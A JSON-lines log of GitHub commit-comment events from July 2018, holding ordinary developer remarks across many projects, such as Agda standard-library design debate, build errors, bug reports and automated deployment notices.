{"id":"8012111188","type":"CommitCommentEvent","actor":{"login":"he1975"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29818456,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T18:54:06Z","updated_at":"2018-07-24T18:54:06Z","author_association":"NONE","body":"good project."}},"created_at":"2018-07-24T18:54:06Z"}
{"id":"8012114177","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29818463,"position":null,"line":null,"path":null,"commit_id":"ec1e74d825d3ee624b71c3a87521706c96fd51fa","created_at":"2018-07-24T18:54:41Z","updated_at":"2018-07-24T18:54:41Z","author_association":"OWNER","body":"Created multidev environment [msgu#ci-57](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#ci-57).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-57-msgu.pantheonsite.io/)"}},"created_at":"2018-07-24T18:54:41Z"}
{"id":"8012118301","type":"CommitCommentEvent","actor":{"login":"paulswartz"},"repo":{"name":"mbta/signs_ui"},"payload":{"comment":{"id":29818469,"position":null,"line":null,"path":null,"commit_id":"536b542a832d5e01fe6b69f6e05695a00983b876","created_at":"2018-07-24T18:55:26Z","updated_at":"2018-07-24T18:55:26Z","author_association":"NONE","body":"talk w/ Sky; I think there was something else they had to do to get web sockets running"}},"created_at":"2018-07-24T18:55:26Z"}
{"id":"8012122965","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-guide"},"payload":{"comment":{"id":29818478,"position":26,"line":137,"path":"guide/xml/using.xml","commit_id":"c15987cbb65719a33378e83f9e7a0e08b832f79b","created_at":"2018-07-24T18:56:18Z","updated_at":"2018-07-24T18:56:18Z","author_association":"CONTRIBUTOR","body":"This causes the guide to [fail to build](https://build.macports.org/builders/jobs-guide/builds/43/steps/validate/logs/stdio):\r\n\r\n```\r\nusing.xml:137: element command: validity error : Element option is not declared in command list of possible children\r\nusing.xml:143: element command: validity error : Element option is not declared in command list of possible children\r\nDocument guide/xml/guide.xml does not validate\r\n```"}},"created_at":"2018-07-24T18:56:18Z"}
{"id":"8012125061","type":"CommitCommentEvent","actor":{"login":"gallais"},"repo":{"name":"agda/agda-stdlib"},"payload":{"comment":{"id":29818484,"position":null,"line":null,"path":null,"commit_id":"3fa7e0f06dba3af2c726f8742a9a50a07341f402","created_at":"2018-07-24T18:56:43Z","updated_at":"2018-07-24T18:56:43Z","author_association":"MEMBER","body":"I believe the `BUILTIN`s are now in [`Agda.Builtin.Nat`](https://agda.github.io/agda-stdlib/Agda.Builtin.Nat.html) which is shipped with the compiler\r\nprecisely so that all the libraries can use the same builtins and avoid these kind of conflicts."}},"created_at":"2018-07-24T18:56:43Z"}
{"id":"8012129152","type":"CommitCommentEvent","actor":{"login":"ayusharma"},"repo":{"name":"verdaccio/verdaccio"},"payload":{"comment":{"id":29818490,"position":null,"line":null,"path":null,"commit_id":"564daaadd238265d444538693ad43450fc3948b5","created_at":"2018-07-24T18:57:29Z","updated_at":"2018-07-24T18:57:29Z","author_association":"MEMBER","body":"Looks good 👍 "}},"created_at":"2018-07-24T18:57:29Z"}
{"id":"8012132667","type":"CommitCommentEvent","actor":{"login":"wenkokke"},"repo":{"name":"agda/agda-stdlib"},"payload":{"comment":{"id":29818500,"position":null,"line":null,"path":null,"commit_id":"3fa7e0f06dba3af2c726f8742a9a50a07341f402","created_at":"2018-07-24T18:58:09Z","updated_at":"2018-07-24T18:58:09Z","author_association":"NONE","body":"That is true, but that doesn't take away that sometimes you want to roll your own builtins, for instance for didactic purposes or just because you're stubborn."}},"created_at":"2018-07-24T18:58:09Z"}
{"id":"8012134887","type":"CommitCommentEvent","actor":{"login":"LubomirR"},"repo":{"name":"LubomirR/scummvm"},"payload":{"comment":{"id":29818503,"position":60,"line":124,"path":"engines/mutationofjb/font.cpp","commit_id":"907660e58b217879a1339d8a411d8d0c2082c148","created_at":"2018-07-24T18:58:34Z","updated_at":"2018-07-24T18:58:34Z","author_association":"OWNER","body":"Hi @sev-,\r\nWe were aware of this method. However, we need to make sure the bounding box is exactly the same as in the original game. When the text is supposed to be cleared, its bounding box is used for redrawing the area. If we redraw more (i.e. we get a different bbox), the effect of some rendering commands from the script could be reverted by this operation.\r\n\r\nSo what we could do here is to try to use wordWrapText(). Actually, @MiroslavR already implemented it in https://github.com/LubomirR/scummvm/pull/10. There are some subtle (and one big) difference in the ScummVM implementation. So far we don't see the small differences happen, but if we do, unfortunately we will have to revert to the old implementation.\r\n\r\nHowever, the big one can be observed quite easily as @MiroslavR pointed out in the PR. Today we debugged it and found out it's a bug in ScummVM code. If you think it's okay to fix wordWrapText(), I'll submit a PR."}},"created_at":"2018-07-24T18:58:34Z"}
{"id":"8012135927","type":"CommitCommentEvent","actor":{"login":"kumabot"},"repo":{"name":"kumabot/test"},"payload":{"comment":{"id":29818505,"position":10,"line":8,"path":"README.md","commit_id":"c4efd636ef054a89607b8399d9da50d9dd847ea5","created_at":"2018-07-24T18:58:45Z","updated_at":"2018-07-24T18:58:45Z","author_association":"OWNER","body":"* foobar1\r\n  * foobar2\r\n      ```\r\n      code block\r\n      ```\r\n  * foobar3\r\n* foobar4\r\n\r\n"}},"created_at":"2018-07-24T18:58:45Z"}
{"id":"8012137356","type":"CommitCommentEvent","actor":{"login":"anjalijain1998"},"repo":{"name":"anjalijain1998/itsme"},"payload":{"comment":{"id":29818509,"position":null,"line":null,"path":null,"commit_id":"855052c765ced6a96850c279d645cbfc967dbd31","created_at":"2018-07-24T18:59:03Z","updated_at":"2018-07-24T18:59:03Z","author_association":"OWNER","body":"Hey everyone,\r\nI have completed my first project that is \"My Tribute Page\". I will appreciate you guys for your responsive feedbacks.  \r\nLink:  https://codepen.io/anjalijain1998/pen/WKjrbR?editors=1100\r\nThanks in advance"}},"created_at":"2018-07-24T18:59:03Z"}
{"id":"8012138228","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29818517,"position":null,"line":null,"path":null,"commit_id":"24ca39237e14c233fd481b2ceefd40d201e9e289","created_at":"2018-07-24T18:59:12Z","updated_at":"2018-07-24T18:59:12Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-532](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-532).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-532-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-24T18:59:12Z"}
{"id":"8012139546","type":"CommitCommentEvent","actor":{"login":"gallais"},"repo":{"name":"agda/agda-stdlib"},"payload":{"comment":{"id":29818522,"position":null,"line":null,"path":null,"commit_id":"3fa7e0f06dba3af2c726f8742a9a50a07341f402","created_at":"2018-07-24T18:59:27Z","updated_at":"2018-07-24T18:59:27Z","author_association":"MEMBER","body":"In this case what's wrong with importing [`Agda.Primitive`](https://agda.github.io/agda-stdlib/Agda.Primitive.html) instead of relying on the\r\nstandard library's `Level`?"}},"created_at":"2018-07-24T18:59:27Z"}
{"id":"8012158154","type":"CommitCommentEvent","actor":{"login":"RiotR1cket"},"repo":{"name":"google/guice"},"payload":{"comment":{"id":29818566,"position":null,"line":null,"path":null,"commit_id":"c285193b47a1d0a6695c74cec61920119c03bc56","created_at":"2018-07-24T19:02:44Z","updated_at":"2018-07-24T19:02:44Z","author_association":"NONE","body":"Actually, while this does make it consistent, it is wrong. The other instances that say \"urls\" should have been corrected to \"plugins\". This is a copy-paste error from the `ProvidesIntoSet` which uses urls as an example; where here it is using Plugins in this example."}},"created_at":"2018-07-24T19:02:44Z"}
{"id":"8012159501","type":"CommitCommentEvent","actor":{"login":"clelland"},"repo":{"name":"WICG/feature-policy"},"payload":{"comment":{"id":29818570,"position":null,"line":null,"path":null,"commit_id":"37d974c0ef1a9ef9f3d309fb71e6426bb6459c32","created_at":"2018-07-24T19:03:00Z","updated_at":"2018-07-24T19:03:00Z","author_association":"CONTRIBUTOR","body":"This fixes #190"}},"created_at":"2018-07-24T19:03:00Z"}
{"id":"8012161132","type":"CommitCommentEvent","actor":{"login":"TatianaKobets"},"repo":{"name":"TatianaKobets/tatianakobets.github.io"},"payload":{"comment":{"id":29818576,"position":null,"line":null,"path":null,"commit_id":"ade136554b3451e901ae3a948a88c93ad3ec50c9","created_at":"2018-07-24T19:03:20Z","updated_at":"2018-07-24T19:03:20Z","author_association":"OWNER","body":"Внесены изменения в position"}},"created_at":"2018-07-24T19:03:20Z"}
{"id":"8012167632","type":"CommitCommentEvent","actor":{"login":"mbrainerd"},"repo":{"name":"mbrainerd/tk-config-default2"},"payload":{"comment":{"id":29818593,"position":63,"line":91,"path":"hooks/tk-multi-publish2/ingest/collector.py","commit_id":"526890fd70a019fc8364fe200ce20b5b98b15c02","created_at":"2018-07-24T19:04:34Z","updated_at":"2018-07-24T19:04:34Z","author_association":"OWNER","body":"I just copied the old logic, which first processed `os.path.basename(path)`. Feel free to update the 3.x branch with the proper logic."}},"created_at":"2018-07-24T19:04:34Z"}
{"id":"8012173856","type":"CommitCommentEvent","actor":{"login":"TroubleMakerBen"},"repo":{"name":"bitstadium/HockeySDK-Android"},"payload":{"comment":{"id":29818613,"position":5,"line":8,"path":"hockeysdk/src/main/AndroidManifest.xml","commit_id":"8d24cc936fb5338d2c8d24f1e980bcd40a30b887","created_at":"2018-07-24T19:05:49Z","updated_at":"2018-07-24T19:05:49Z","author_association":"MEMBER","body":"We limit the permission because of the changes to that permission for Android Oreo and above.\r\n\r\nI appreciate your input here and you are right that everyone would notice the SDK throwing a `RuntimeException`. The problem is that \"everyone\" only translates to maybe 9/10 of users and a Crash Reporting SDK that crashes an app is not what we want. Because of this, we never, ever crash a users app at runtime.\r\n\r\nWe won't make changes to this for now, options on the table right now are:\r\n* we will drop support for Android versions < 19 and just remove the permission altogether\r\n* people need migrate to the AppCenter SDK eventually\r\n* we leave as is for now\r\n\r\nThx for understanding and using HockeyApp in the first place!"}},"created_at":"2018-07-24T19:05:49Z"}
{"id":"8012176553","type":"CommitCommentEvent","actor":{"login":"wenkokke"},"repo":{"name":"agda/agda-stdlib"},"payload":{"comment":{"id":29818621,"position":null,"line":null,"path":null,"commit_id":"3fa7e0f06dba3af2c726f8742a9a50a07341f402","created_at":"2018-07-24T19:06:21Z","updated_at":"2018-07-24T19:06:21Z","author_association":"NONE","body":" You're right that I could just import `Agda.Primitive` _if_ I were the one importing `Level` to begin with. However, `Level` is imported in many places in the standard library, for instance in `Relation.Binary.PropositionalEquality`. All modules using `Level` now become unavailable for those rolling their own version of the naturals."}},"created_at":"2018-07-24T19:06:21Z"}
{"id":"8012184191","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29818638,"position":null,"line":null,"path":null,"commit_id":"e05c8c827ebb254bafd9b155b5a30db690176b9a","created_at":"2018-07-24T19:07:51Z","updated_at":"2018-07-24T19:07:51Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-151](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-151).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-151-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-24T19:07:51Z"}
{"id":"8012190529","type":"CommitCommentEvent","actor":{"login":"KathleenSullivan"},"repo":{"name":"OpenDataLiteracy/WA-State-Library-2018"},"payload":{"comment":{"id":29818658,"position":null,"line":null,"path":null,"commit_id":"45a5b4d8e3c45f062f0e54aeed048cd6a322d4eb","created_at":"2018-07-24T19:09:06Z","updated_at":"2018-07-24T19:09:06Z","author_association":"COLLABORATOR","body":"It's in the GitHub repository -- in the Environmental Scan folder as\n\"ODL_WACounties&CitiesOpenData.csv\"\n\nI'm only about halfway through and it's not cleaned up or anything.\n\nK\n\nOn Tue, Jul 24, 2018 at 11:23 AM, Nic <notifications@github.com> wrote:\n\n> Cool - could you post that spreadsheet at some point? Or direct me to\n> where it is? Thats a great resource !\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/OpenDataLiteracy/WA-State-Library-2018/commit/45a5b4d8e3c45f062f0e54aeed048cd6a322d4eb#commitcomment-29818110>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AZfikV94DnR8kprMBQjepqHREsiLaDOCks5uJ2YogaJpZM4VdO7D>\n> .\n>\n"}},"created_at":"2018-07-24T19:09:06Z"}
{"id":"8012190990","type":"CommitCommentEvent","actor":{"login":"wenkokke"},"repo":{"name":"agda/agda-stdlib"},"payload":{"comment":{"id":29818660,"position":null,"line":null,"path":null,"commit_id":"3fa7e0f06dba3af2c726f8742a9a50a07341f402","created_at":"2018-07-24T19:09:12Z","updated_at":"2018-07-24T19:09:12Z","author_association":"NONE","body":"A different solution would be to evaluate each import of `Level` and change it to an import of `Agda.Primitive` unless it absolutely needs Nat-computed levels. However, seems like it would be more work."}},"created_at":"2018-07-24T19:09:12Z"}
{"id":"8012196115","type":"CommitCommentEvent","actor":{"login":"TatianaKobets"},"repo":{"name":"TatianaKobets/tatianakobets.github.io"},"payload":{"comment":{"id":29818668,"position":null,"line":null,"path":null,"commit_id":"d87c367151f505a9c7906a7baf49c92021497cd2","created_at":"2018-07-24T19:10:16Z","updated_at":"2018-07-24T19:10:16Z","author_association":"OWNER","body":"Обновление"}},"created_at":"2018-07-24T19:10:16Z"}
{"id":"8012196203","type":"CommitCommentEvent","actor":{"login":"PCTipsGR"},"repo":{"name":"TristianK3604/mofh-theme"},"payload":{"comment":{"id":29818670,"position":null,"line":null,"path":null,"commit_id":"7e9348b54e8ce01d83509c275ce87754ec02f83b","created_at":"2018-07-24T19:10:18Z","updated_at":"2018-07-24T19:10:18Z","author_association":"NONE","body":"Why did you deprecate Materialize and switched over to simple Material?"}},"created_at":"2018-07-24T19:10:18Z"}
{"id":"8012208913","type":"CommitCommentEvent","actor":{"login":"derrickreimer"},"repo":{"name":"levelhq/level"},"payload":{"comment":{"id":29818702,"position":5,"line":38,"path":"script/bootstrap","commit_id":"6a7eff5e199cf78bdfda80bbaef38c09640e598d","created_at":"2018-07-24T19:12:52Z","updated_at":"2018-07-24T19:12:52Z","author_association":"MEMBER","body":"You bet! While you're here, I'd like to pick your brain on the subject of configuration. It seems like Elixir/Phoenix conventions point toward using a \"secret\" Mix config file (that is not version controlled), but I'm also seeing a lot environment variable use throughout the ecosystem. Now that I've introduced a dependency on S3, I need an easy way to bring credentials into the app in dev.\r\n\r\nI like this approach because I don't have to go modify my shell config to define env vars specific to the application -- instead, I can just drop them in `dev.secret.exs`. Same for local DB creds. But I'm not sure if this is too weird or off the conventional path. Thoughts?"}},"created_at":"2018-07-24T19:12:52Z"}
{"id":"8012211803","type":"CommitCommentEvent","actor":{"login":"fredbuluku"},"repo":{"name":"fredbuluku/metamask-extension"},"payload":{"comment":{"id":29818708,"position":null,"line":null,"path":null,"commit_id":"f4fe3e81c16073c06aef489252f31cabef8b2214","created_at":"2018-07-24T19:13:24Z","updated_at":"2018-07-24T19:13:24Z","author_association":"OWNER","body":"> provide me with full information to get involved \r\n\r\n> it will work well if all information is available \r\n\r\n> git effect the change\r\n\r\n> git offer good services\r\n\r\n> "}},"created_at":"2018-07-24T19:13:24Z"}
{"id":"8012214382","type":"CommitCommentEvent","actor":{"login":"photoszzt"},"repo":{"name":"hermitcore/libhermit-rs"},"payload":{"comment":{"id":29818716,"position":111,"line":111,"path":"librs/src/arch/aarch64/mm/paging.rs","commit_id":"aad2b8af56a6bb7fc4add46855679e722e68172e","created_at":"2018-07-24T19:13:53Z","updated_at":"2018-07-24T19:13:53Z","author_association":"NONE","body":"I think there's benefit to define a type alias as:\r\npub type PhysicalAddress = usize;\r\npub type VirtualAddress = usize;\r\nlike what https://os.phil-opp.com/page-tables/ does. \r\n\r\nIt's easier to know what's the return value is by the type if you change the usize to PhysicalAddress."}},"created_at":"2018-07-24T19:13:53Z"}
{"id":"8012218734","type":"CommitCommentEvent","actor":{"login":"sdrausty"},"repo":{"name":"sdrausty/TermuxArch"},"payload":{"comment":{"id":29818726,"position":null,"line":null,"path":null,"commit_id":"6c9c119c00c5601bd37c07a2e231c305d4966168","created_at":"2018-07-24T19:14:45Z","updated_at":"2018-07-24T19:14:45Z","author_association":"OWNER","body":"This https://github.com/sdrausty/TermuxArch/commit/6c9c119c00c5601bd37c07a2e231c305d4966168 commit should resolve the keyring issue in https://github.com/sdrausty/TermuxArch/issues/86, https://github.com/sdrausty/TermuxArch/issues/94 and https://github.com/sdrausty/TermuxArch/pull/95.                                 "}},"created_at":"2018-07-24T19:14:45Z"}
{"id":"8012219271","type":"CommitCommentEvent","actor":{"login":"pm-abhinav-sinha"},"repo":{"name":"PubMatic/OpenWrap"},"payload":{"comment":{"id":29818728,"position":5,"line":93,"path":"src_new/gdpr.js","commit_id":"1d224bae1c7bb30caaf135573d714620d43bcd1d","created_at":"2018-07-24T19:14:52Z","updated_at":"2018-07-24T19:14:52Z","author_association":"CONTRIBUTOR","body":"This check is redundant, the top level if already checks for result."}},"created_at":"2018-07-24T19:14:52Z"}
{"id":"8012224299","type":"CommitCommentEvent","actor":{"login":"StefanRijnhart"},"repo":{"name":"EssentNovaTeam/account-financial-reporting"},"payload":{"comment":{"id":29818741,"position":68,"line":103,"path":"account_financial_report_webkit/models/account_static_balance.py","commit_id":"4abb38392cb234056181d956eed1b19c42d54e3e","created_at":"2018-07-24T19:15:55Z","updated_at":"2018-07-24T19:15:55Z","author_association":"NONE","body":"Thanks! Fixed in https://github.com/EssentNovaTeam/account-financial-reporting/compare/ec51cd2f19...EssentNovaTeam:fix/performance-add-static-initial-balance#diff-1fb555fd40412928a5dedd60a8a70c68R91"}},"created_at":"2018-07-24T19:15:55Z"}
{"id":"8012226750","type":"CommitCommentEvent","actor":{"login":"StefanRijnhart"},"repo":{"name":"EssentNovaTeam/account-financial-reporting"},"payload":{"comment":{"id":29818746,"position":188,"line":125,"path":"account_financial_report_webkit/report/common_balance_reports.py","commit_id":"4abb38392cb234056181d956eed1b19c42d54e3e","created_at":"2018-07-24T19:16:24Z","updated_at":"2018-07-24T19:16:24Z","author_association":"NONE","body":"Thanks! Gone now."}},"created_at":"2018-07-24T19:16:24Z"}
{"id":"8012228487","type":"CommitCommentEvent","actor":{"login":"brenocristovao"},"repo":{"name":"rogermedeirosdasilva/Exemplos"},"payload":{"comment":{"id":29818751,"position":null,"line":null,"path":null,"commit_id":"d0c85b88fffc7b1ce878d306184818cba7e9eb24","created_at":"2018-07-24T19:16:45Z","updated_at":"2018-07-24T19:16:45Z","author_association":"NONE","body":"Obrigado por disponibilizar"}},"created_at":"2018-07-24T19:16:45Z"}
{"id":"8012233618","type":"CommitCommentEvent","actor":{"login":"baldram"},"repo":{"name":"errai/errai"},"payload":{"comment":{"id":29818757,"position":null,"line":null,"path":null,"commit_id":"f122c7ece8192fb4b20122d4f705ed9691e52d0d","created_at":"2018-07-24T19:17:51Z","updated_at":"2018-07-24T19:17:51Z","author_association":"NONE","body":"Hello Errai Team,\r\nwhy not mentioned it here: http://errai-blog.blogspot.com/ ?\r\nThe last announced version is 4.1.0.Final and it was more than half a year ago.\r\nIf someone looks at the the official site it's a bit like nothing happens ;-) But this is not true.\r\n\r\n"}},"created_at":"2018-07-24T19:17:51Z"}
{"id":"8012233876","type":"CommitCommentEvent","actor":{"login":"alkis"},"repo":{"name":"romkatv/hcproxy"},"payload":{"comment":{"id":29818758,"position":52,"line":52,"path":"dns.cc","commit_id":"0c52f01ff136f1897bdf0bfb691b4a6696759810","created_at":"2018-07-24T19:17:55Z","updated_at":"2018-07-24T19:17:55Z","author_association":"NONE","body":"I read the code wrong. But I think there is a race when `dns_cache_ttl` is very close to `dns_cache_refresh_period`. Assuming they are the same and:\r\n\r\n`resolved_at == successfully_resolved_at`\r\n`resolved_at + dns_cache_ttl == 10`\r\n\r\nline61: T2 `now == 9` + context switch\r\nline34: T1 `now == 11`\r\nline35: T1 grabs lock, line51: `10 > 11 == false` -> does not set addr\r\nline62: T2 grabs lock, line67: `10 <= 9 == false` -> does not update addr\r\n\r\nArguably this is not broken, the race is introduced when `dns_cache_ttl` is very close to `dns_cache_refresh_period` which is not a particularly interesting configuration."}},"created_at":"2018-07-24T19:17:55Z"}
{"id":"8012238179","type":"CommitCommentEvent","actor":{"login":"bfred-it"},"repo":{"name":"sindresorhus/refined-github"},"payload":{"comment":{"id":29818768,"position":17,"line":6,"path":"source/features/set-default-repositories-type-to-sources.js","commit_id":"0184fafcfdacff4a2778e34242de92b5bdd2c177","created_at":"2018-07-24T19:18:47Z","updated_at":"2018-07-24T19:18:47Z","author_association":"COLLABORATOR","body":"Thanks!"}},"created_at":"2018-07-24T19:18:47Z"}
{"id":"8012241776","type":"CommitCommentEvent","actor":{"login":"Obbi89"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":29818775,"position":42,"line":808,"path":"src/Illuminate/Database/Eloquent/Model.php","commit_id":"eb1820899e882cf0cde9c255f55cdd9e94859edc","created_at":"2018-07-24T19:19:30Z","updated_at":"2018-07-24T19:19:30Z","author_association":"NONE","body":"@taylorotwell \r\nI'm not sure if this is needed for the __call magic mentioned below.\r\nOtherwise this call causes an issue with transient models.\r\n\r\n```php\r\n$model = new Model();\r\n$model->increment('column');\r\n```\r\nWill update all rows even though it is called on an instance!\r\nCause this instance does not persist yet.\r\nOne would either expect that it modifies that column on the instance directly\r\nor throw an Error that increment cannot be run on non-persistent Instances and one should either\r\nuse save()/push() first to persist the model or increment the value by hand using $model->column++ or similar."}},"created_at":"2018-07-24T19:19:30Z"}
{"id":"8012242584","type":"CommitCommentEvent","actor":{"login":"leandromarchon"},"repo":{"name":"leandromarchon/Responsive-Website"},"payload":{"comment":{"id":29818776,"position":null,"line":null,"path":null,"commit_id":"06cfd7e93c7884a6389d413ea6a74b33fd4b1b9b","created_at":"2018-07-24T19:19:40Z","updated_at":"2018-07-24T19:19:40Z","author_association":"OWNER","body":"Também foi removido trecho de textos."}},"created_at":"2018-07-24T19:19:40Z"}
{"id":"8012245612","type":"CommitCommentEvent","actor":{"login":"thomas-hervey"},"repo":{"name":"openstreetmap/iD"},"payload":{"comment":{"id":29818783,"position":6,"line":168,"path":"data/shortcuts.json","commit_id":"63614d5909107f5f4fbef248e79a3ee162c18a5a","created_at":"2018-07-24T19:20:16Z","updated_at":"2018-07-24T19:20:16Z","author_association":"COLLABORATOR","body":"Weird. Yeah I wanted to format this normally but I'm my environment everything was wrapped like that"}},"created_at":"2018-07-24T19:20:16Z"}
{"id":"8012249982","type":"CommitCommentEvent","actor":{"login":"pkboom"},"repo":{"name":"pkboom/javascript-tips"},"payload":{"comment":{"id":29818788,"position":null,"line":null,"path":null,"commit_id":"db951c2f82a70eebed6cd4406ed3e94f4c0c1949","created_at":"2018-07-24T19:21:10Z","updated_at":"2018-07-24T19:21:10Z","author_association":"OWNER","body":"https://medium.com/@ramsunvtech/promises-of-promise-part-1-53f769245a53"}},"created_at":"2018-07-24T19:21:10Z"}
{"id":"8012253997","type":"CommitCommentEvent","actor":{"login":"gallais"},"repo":{"name":"agda/agda-stdlib"},"payload":{"comment":{"id":29818794,"position":null,"line":null,"path":null,"commit_id":"3fa7e0f06dba3af2c726f8742a9a50a07341f402","created_at":"2018-07-24T19:21:59Z","updated_at":"2018-07-24T19:21:59Z","author_association":"MEMBER","body":"> All modules using `Level`, either directly or transitively, now become unavailable for those rolling their own naturals.\r\n\r\nThis seems like an awfully specific case but then again the two functions in question are\r\nnot that important so I don't see any issue moving them to another module if that is more\r\nconvenient for you.\r\n\r\n> A different solution would be to evaluate each import of `Level` and change it to an import of `Agda.Primitive`\r\n\r\n`Level` renames some of the definitions it re-exports so we would have to add these renaming\r\neverywhere. I do not think it is a reasonable solution.\r\n\r\n\r\nAre you using any other module that should not depend upon `Agda.Builtin.Nat`?"}},"created_at":"2018-07-24T19:21:59Z"}
{"id":"8012258879","type":"CommitCommentEvent","actor":{"login":"mdasil44"},"repo":{"name":"mdasil44/Ionic_Polymer_Glove"},"payload":{"comment":{"id":29818803,"position":null,"line":null,"path":null,"commit_id":"c515dafd45c4c00a377694580c76613316c8864d","created_at":"2018-07-24T19:23:01Z","updated_at":"2018-07-24T19:23:01Z","author_association":"OWNER","body":"The reference sensor plot in the Matlab GUI is not currently working because of some unknown error with the ppsInitialize function."}},"created_at":"2018-07-24T19:23:01Z"}
{"id":"8012259964","type":"CommitCommentEvent","actor":{"login":"mbarnes-sb"},"repo":{"name":"fl4re/open_bilrost_server"},"payload":{"comment":{"id":29818807,"position":4,"line":4,"path":"api.raml","commit_id":"91898ca39e402097eb65e79a6d30ed18fbda77da","created_at":"2018-07-24T19:23:14Z","updated_at":"2018-07-24T19:23:14Z","author_association":"NONE","body":"@dgaya @maxime-helen-sb @RemiArnaud has this been addressed? If so this repo needs to be rebased again."}},"created_at":"2018-07-24T19:23:14Z"}
{"id":"8012262248","type":"CommitCommentEvent","actor":{"login":"TylerKirby"},"repo":{"name":"adeloucas/cltk"},"payload":{"comment":{"id":29818812,"position":18,"line":39,"path":"cltk/tokenize/line.py","commit_id":"db621d1cce2b481b5d581a05b0b7bceb2b55ac52","created_at":"2018-07-24T19:23:44Z","updated_at":"2018-07-24T19:23:44Z","author_association":"NONE","body":"I would move this to the Akkadian module."}},"created_at":"2018-07-24T19:23:44Z"}
{"id":"8012293072","type":"CommitCommentEvent","actor":{"login":"Zilbo"},"repo":{"name":"CptCold123/SaitFTCTeam1"},"payload":{"comment":{"id":29818878,"position":null,"line":null,"path":null,"commit_id":"78d7696638a2111bb8db5da9c408d85cdf9869d2","created_at":"2018-07-24T19:30:11Z","updated_at":"2018-07-24T19:30:11Z","author_association":"NONE","body":"First"}},"created_at":"2018-07-24T19:30:11Z"}
{"id":"8012297149","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29818891,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T19:31:02Z","updated_at":"2018-07-24T19:31:02Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T19:31:02Z"}
{"id":"8012297573","type":"CommitCommentEvent","actor":{"login":"aastha21799"},"repo":{"name":"aastha21799/CloudyWeather"},"payload":{"comment":{"id":29818893,"position":null,"line":null,"path":null,"commit_id":"15b28df643dc059169ba207d4af7cfe6af397d66","created_at":"2018-07-24T19:31:07Z","updated_at":"2018-07-24T19:31:07Z","author_association":"OWNER","body":"What changes have you made"}},"created_at":"2018-07-24T19:31:07Z"}
{"id":"8012297764","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818895,"position":4,"line":4,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:31:10Z","updated_at":"2018-07-24T19:31:10Z","author_association":"OWNER","body":"This is a humming bird, I cant tell. :("}},"created_at":"2018-07-24T19:31:10Z"}
{"id":"8012300930","type":"CommitCommentEvent","actor":{"login":"jordan-massingill"},"repo":{"name":"LambdaSchool/React-UI-Components"},"payload":{"comment":{"id":29818905,"position":null,"line":null,"path":null,"commit_id":"f3760d7f1f0a7864fa908335562513515943c83c","created_at":"2018-07-24T19:31:49Z","updated_at":"2018-07-24T19:31:49Z","author_association":"NONE","body":"Initial PR day 2"}},"created_at":"2018-07-24T19:31:49Z"}
{"id":"8012301664","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818908,"position":62,"line":62,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:31:59Z","updated_at":"2018-07-24T19:31:59Z","author_association":"OWNER","body":"polar bear swimming underwater above"}},"created_at":"2018-07-24T19:31:59Z"}
{"id":"8012303823","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29818912,"position":91,"line":91,"path":"experiment2.txt","commit_id":"ff5ba098e09e5dfd2f50d9e2792c920baca1cd16","created_at":"2018-07-24T19:32:26Z","updated_at":"2018-07-24T19:32:26Z","author_association":"OWNER","body":"a snow covered mountain"}},"created_at":"2018-07-24T19:32:26Z"}
{"id":"8012304073","type":"CommitCommentEvent","actor":{"login":"mdpiper"},"repo":{"name":"permamodel/pbs-server"},"payload":{"comment":{"id":29818913,"position":null,"line":null,"path":null,"commit_id":"f9113a2206c4afeae05fc4013a8e3ac6c919968f","created_at":"2018-07-24T19:32:29Z","updated_at":"2018-07-24T19:32:29Z","author_association":"MEMBER","body":"This fixes #5."}},"created_at":"2018-07-24T19:32:29Z"}
